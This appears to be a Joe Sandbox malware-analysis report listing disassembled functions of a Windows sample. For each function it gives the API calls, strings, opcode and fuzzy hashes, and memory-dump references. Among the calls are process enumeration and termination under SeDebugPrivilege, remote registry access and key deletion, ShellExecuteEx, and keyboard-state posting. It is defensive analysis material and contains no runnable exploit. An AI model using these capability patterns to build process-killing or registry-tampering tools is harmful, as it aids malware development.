                                                                    • Part of subcall function 00396532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00396554
                                                                    • Part of subcall function 00396532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00396564
                                                                    • Part of subcall function 00396532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 003965F9
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B179A
                                                                  • GetLastError.KERNEL32 ref: 003B17AD
                                                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 003B17D9
                                                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 003B1855
                                                                  • GetLastError.KERNEL32(00000000), ref: 003B1860
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003B1895
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                  • String ID: SeDebugPrivilege
                                                                  • API String ID: 2533919879-2896544425
                                                                  • Opcode ID: 8777210a7db05101f19bf356b12326c03d1d02872d33bf630592e2e149263f4b
                                                                  • Instruction ID: 0ddf0532d0270072e1ae0e1602e27f958e93808473c35e141dba490e5b9eee3c
                                                                  • Opcode Fuzzy Hash: 8777210a7db05101f19bf356b12326c03d1d02872d33bf630592e2e149263f4b
                                                                  • Instruction Fuzzy Hash: 9841BD71600201AFDB07EF54C8A6FAEB7A9BF44314F058059FA069F2D2DB75A904CB91
                                                                  Function 00395819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • LoadIconW.USER32(00000000,00007F03), ref: 003958B8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoad
                                                                  • String ID: blank$info$question$stop$warning
                                                                  • API String ID: 2457776203-404129466
                                                                  • Opcode ID: 396b98d81a50871ac2832179cbb3f15e11d538d6885772ae94f029264e280a7b
                                                                  • Instruction ID: e63aff1b3c3b8302ce2ab2a8833f498d99d327c5cfbe5c8012613ad6fe58e00c
                                                                  • Opcode Fuzzy Hash: 396b98d81a50871ac2832179cbb3f15e11d538d6885772ae94f029264e280a7b
                                                                  • Instruction Fuzzy Hash: F911EB7230D742FAEB275F549C82E6A379C9F25714F30003BF514B52C1E775AA804368
                                                                  Function 0039A729 Relevance: 12.3, APIs: 8, Instructions: 317COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SafeArrayGetVartype.OLEAUT32(?,00000000), ref: 0039A806
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ArraySafeVartype
                                                                  • String ID:
                                                                  • API String ID: 1725837607-0
                                                                  • Opcode ID: 0a7673f1d12cb98cfe096c162d1d13fbc1c664c1aaec17b976623d22d6669f81
                                                                  • Instruction ID: 79af4306f1c51698684e5997bfbf2dface8f83eaf64b7a34d5237cf944a4b6c4
                                                                  • Opcode Fuzzy Hash: 0a7673f1d12cb98cfe096c162d1d13fbc1c664c1aaec17b976623d22d6669f81
                                                                  • Instruction Fuzzy Hash: 8DC18A75A0561A9FDF02CF98D481BAEB7F4FF08315F20816AE605EB241DB34AA41CBD1
                                                                  Function 00396B49 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 46windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00396B63
                                                                  • LoadStringW.USER32(00000000), ref: 00396B6A
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00396B80
                                                                  • LoadStringW.USER32(00000000), ref: 00396B87
                                                                  • _wprintf.LIBCMT ref: 00396BAD
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00396BCB
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00396BA8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 3648134473-3128320259
                                                                  • Opcode ID: 7708533283f77843a148e1346eb137ee9d0d30c058cbc453e9b1035e0456f98c
                                                                  • Instruction ID: c55a9449bc4ebc77a164186a5a7af352ff5b2d2e39f6f9f0334ae3e9ffa24d34
                                                                  • Opcode Fuzzy Hash: 7708533283f77843a148e1346eb137ee9d0d30c058cbc453e9b1035e0456f98c
                                                                  • Instruction Fuzzy Hash: 020136F75012187FEB52ABA4AD89EF7776CE704304F0044A6B745E6041EA74DE858F74
                                                                  Function 003B2B19 Relevance: 12.3, APIs: 8, Instructions: 251registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 003B3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003B2BB5,?,?), ref: 003B3C1D
                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003B2BF6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: BuffCharConnectRegistryUpper
                                                                  • String ID:
                                                                  • API String ID: 2595220575-0
                                                                  • Opcode ID: 890dd58486df24d57c6e92d5b23182523af4628963f93762bef6628677dc1e49
                                                                  • Instruction ID: 8f4610983014e275cde0842daf7669a8af760d79f2bbaba7b1a8379c085491f6
                                                                  • Opcode Fuzzy Hash: 890dd58486df24d57c6e92d5b23182523af4628963f93762bef6628677dc1e49
                                                                  • Instruction Fuzzy Hash: AD917D712042019FCB12EF54C895FAEBBE5FF88314F04895DFA969B2A1DB34E905CB42
                                                                  Function 003A95BF Relevance: 12.2, APIs: 8, Instructions: 247networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • select.WSOCK32 ref: 003A9691
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A969E
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000), ref: 003A96C8
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 003A96E9
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 003A96F8
                                                                  • htons.WSOCK32(?,?,?,00000000,?), ref: 003A97AA
                                                                  • inet_ntoa.WSOCK32(?,?,?,?,?,?,?,?,?,?,?,?,003EDC00), ref: 003A9765
                                                                    • Part of subcall function 0038D2FF: _strlen.LIBCMT ref: 0038D309
                                                                  • _strlen.LIBCMT ref: 003A9800
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast_strlen$htonsinet_ntoaselect
                                                                  • String ID:
                                                                  • API String ID: 3480843537-0
                                                                  • Opcode ID: e14596ce8eff3280019f25d872cd1bfa9d863d1d01824e7e84f7137b9451e468
                                                                  • Instruction ID: c627b949310e6c4d5f1208735c9365df76a13e677f1baeea83a1b56ac7cdf8ca
                                                                  • Opcode Fuzzy Hash: e14596ce8eff3280019f25d872cd1bfa9d863d1d01824e7e84f7137b9451e468
                                                                  • Instruction Fuzzy Hash: B081AE31504200AFC716EF64DC85F6BB7ACEF86714F108A1EF955AB2A1EB30D904CB92
                                                                  Function 0037A979 Relevance: 12.1, APIs: 8, Instructions: 118COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __mtinitlocknum.LIBCMT ref: 0037A991
                                                                    • Part of subcall function 00377D7C: __FF_MSGBANNER.LIBCMT ref: 00377D91
                                                                    • Part of subcall function 00377D7C: __NMSG_WRITE.LIBCMT ref: 00377D98
                                                                    • Part of subcall function 00377D7C: __malloc_crt.LIBCMT ref: 00377DB8
                                                                  • __lock.LIBCMT ref: 0037A9A4
                                                                  • __lock.LIBCMT ref: 0037A9F0
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00406DE0,00000018,00385E7B,?,00000000,00000109), ref: 0037AA0C
                                                                  • EnterCriticalSection.KERNEL32(8000000C,00406DE0,00000018,00385E7B,?,00000000,00000109), ref: 0037AA29
                                                                  • LeaveCriticalSection.KERNEL32(8000000C), ref: 0037AA39
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
                                                                  • String ID:
                                                                  • API String ID: 1422805418-0
                                                                  • Opcode ID: 4dfa9d9bff4298492f7cd5dd2022eb827325b90c66c37e613235c8d1f24c5c25
                                                                  • Instruction ID: 23f8b4f4185ddb5cb3c408b335994fad34b70e7cf199f23d22ace278f1454cd9
                                                                  • Opcode Fuzzy Hash: 4dfa9d9bff4298492f7cd5dd2022eb827325b90c66c37e613235c8d1f24c5c25
                                                                  • Instruction Fuzzy Hash: A3415A71900A06DBEB729F68DA4179CB7B0AF45334F11C229E42DAF2D1D7BC9840CB86
                                                                  Function 003B8ECC Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DeleteObject.GDI32(00000000), ref: 003B8EE4
                                                                  • GetDC.USER32(00000000), ref: 003B8EEC
                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003B8EF7
                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 003B8F03
                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 003B8F3F
                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 003B8F50
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,003BBD19,?,?,000000FF,00000000,?,000000FF,?), ref: 003B8F8A
                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 003B8FAA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 3864802216-0
                                                                  • Opcode ID: c74995144572a7d8faed709598054babee0624b74e653661521f66d8dea6492b
                                                                  • Instruction ID: fe65c1d5f4e149907cb210551cdbbcb3ff503281c5611382f8ace75835cdc3c2
                                                                  • Opcode Fuzzy Hash: c74995144572a7d8faed709598054babee0624b74e653661521f66d8dea6492b
                                                                  • Instruction Fuzzy Hash: 17317F72141214BFEB128F54DC89FEA3BADEF49715F054065FE089A191D6759841CBB0
                                                                  Function 003C0133 Relevance: 10.7, APIs: 7, Instructions: 245windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0036B34E: GetWindowLongW.USER32(?,000000EB), ref: 0036B35F
                                                                  • GetSystemMetrics.USER32(0000000F), ref: 003C016D
                                                                  • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 003C038D
                                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 003C03AB
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?), ref: 003C03D6
                                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 003C03FF
                                                                  • ShowWindow.USER32(00000003,00000000), ref: 003C0421
                                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 003C0440
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                  • String ID:
                                                                  • API String ID: 3356174886-0
                                                                  • Opcode ID: 0fea52f2973ce73050a9528db25c4724cc9bbfec0dcde92b1cc6761df4660b64
                                                                  • Instruction ID: 3de80e71b7d505b2b8a6d2c7b43b5e13635ccdce977beee60bca137c01204da8
                                                                  • Opcode Fuzzy Hash: 0fea52f2973ce73050a9528db25c4724cc9bbfec0dcde92b1cc6761df4660b64
                                                                  • Instruction Fuzzy Hash: E3A19E35600696EBDB1ECF68C985BBEBBB5BF04700F058159E854EB290DB34AD50CB90
                                                                  Function 0036AE78 Relevance: 10.7, APIs: 7, Instructions: 218COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 762565d1067c1a9ac6ccc4c4148e0e2165821e4236b68a06d0e63d957b8345b2
                                                                  • Instruction ID: 3403076b151b9e4663f5384122e93976929620dce138b4e7fd9b856b360ca1d7
                                                                  • Opcode Fuzzy Hash: 762565d1067c1a9ac6ccc4c4148e0e2165821e4236b68a06d0e63d957b8345b2
                                                                  • Instruction Fuzzy Hash: FD717CB1900509EFCB06CF98CC89EAEBB78FF85310F24C149F915AA255C770AA51CF62
                                                                  Function 003B2230 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 191COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003B225A
                                                                  • _memset.LIBCMT ref: 003B2323
                                                                  • ShellExecuteExW.SHELL32(?), ref: 003B2368
                                                                    • Part of subcall function 0035936C: __swprintf.LIBCMT ref: 003593AB
                                                                    • Part of subcall function 0035936C: __itow.LIBCMT ref: 003593DF
                                                                    • Part of subcall function 0036C6F4: _wcscpy.LIBCMT ref: 0036C717
                                                                  • CloseHandle.KERNEL32(00000000), ref: 003B242F
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 003B243E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                  • String ID: @
                                                                  • API String ID: 4082843840-2766056989
                                                                  • Opcode ID: 7460a561ee9162c9d17e1709e6b01da71cbe17ddfeba0dea268ae212f015db6a
                                                                  • Instruction ID: 3ccd425f956df910e208dfb59f41d9b2ec0250ba258b0c615fbdbef358440fbe
                                                                  • Opcode Fuzzy Hash: 7460a561ee9162c9d17e1709e6b01da71cbe17ddfeba0dea268ae212f015db6a
                                                                  • Instruction Fuzzy Hash: D771C174A00619DFCF06EF94C881AAEB7F5FF48304F018559E95AAB761CB34AD40CB90
                                                                  Function 00393DA8 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(?), ref: 00393DE7
                                                                  • GetKeyboardState.USER32(?), ref: 00393DFC
                                                                  • SetKeyboardState.USER32(?), ref: 00393E5D
                                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00393E8B
                                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00393EAA
                                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00393EF0
                                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00393F13
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: bd3f61564eea2a33c78a252cfad63c38756de22ca81fda4486720e69c1268bfc
                                                                  • Instruction ID: 0c5ba5a4c041607d80fb0852f4565747e94364230fe8e29eea536251ce7604c9
                                                                  • Opcode Fuzzy Hash: bd3f61564eea2a33c78a252cfad63c38756de22ca81fda4486720e69c1268bfc
                                                                  • Instruction Fuzzy Hash: E451C2E1A047D53DFF3743248C55BBA7EA95B06304F098589F0D64A8C2D3A8EEC4D761
                                                                  Function 00393BC3 Relevance: 10.7, APIs: 7, Instructions: 164windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetParent.USER32(00000000), ref: 00393C02
                                                                  • GetKeyboardState.USER32(?), ref: 00393C17
                                                                  • SetKeyboardState.USER32(?), ref: 00393C78
                                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00393CA4
                                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00393CC1
                                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00393D05
                                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00393D26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePost$KeyboardState$Parent
                                                                  • String ID:
                                                                  • API String ID: 87235514-0
                                                                  • Opcode ID: 808c3f3e0b91623d6df1a3aaaf4ec588c9b8564269a63674cc11191a038e0156
                                                                  • Instruction ID: 180ed3e1e0a55e1960bf5dfa166a5737fb11185e38f10b3136dffebabd3e0ca5
                                                                  • Opcode Fuzzy Hash: 808c3f3e0b91623d6df1a3aaaf4ec588c9b8564269a63674cc11191a038e0156
                                                                  • Instruction Fuzzy Hash: A451F7E05087D53DFF3383748C55BB6BFA9AF06300F088489E0D55A8C2D694EE84EB61
                                                                  Function 00397DB1 Relevance: 10.6, APIs: 7, Instructions: 137timeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsncpy$LocalTime
                                                                  • String ID:
                                                                  • API String ID: 2945705084-0
                                                                  • Opcode ID: de57fb8cab216b7f1e9ebe7767a6a7ecabbc4e143a86d75c1d5c297a2716169f
                                                                  • Instruction ID: db45dbf619242ce8f09b5ad4d6d3c7e6cfbb187270fc41323fcf9bafbfb74532
                                                                  • Opcode Fuzzy Hash: de57fb8cab216b7f1e9ebe7767a6a7ecabbc4e143a86d75c1d5c297a2716169f
                                                                  • Instruction Fuzzy Hash: 67416F66C20214B6DF22EBF4CC869CFB3AC9F04310F518966E519F7161FA38E61483A5
                                                                  Function 003B3D72 Relevance: 10.6, APIs: 7, Instructions: 100registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?,?,?), ref: 003B3DA1
                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003B3DCB
                                                                  • FreeLibrary.KERNEL32(00000000), ref: 003B3E80
                                                                    • Part of subcall function 003B3D72: RegCloseKey.ADVAPI32(?), ref: 003B3DE8
                                                                    • Part of subcall function 003B3D72: FreeLibrary.KERNEL32(?), ref: 003B3E3A
                                                                    • Part of subcall function 003B3D72: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 003B3E5D
                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 003B3E25
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
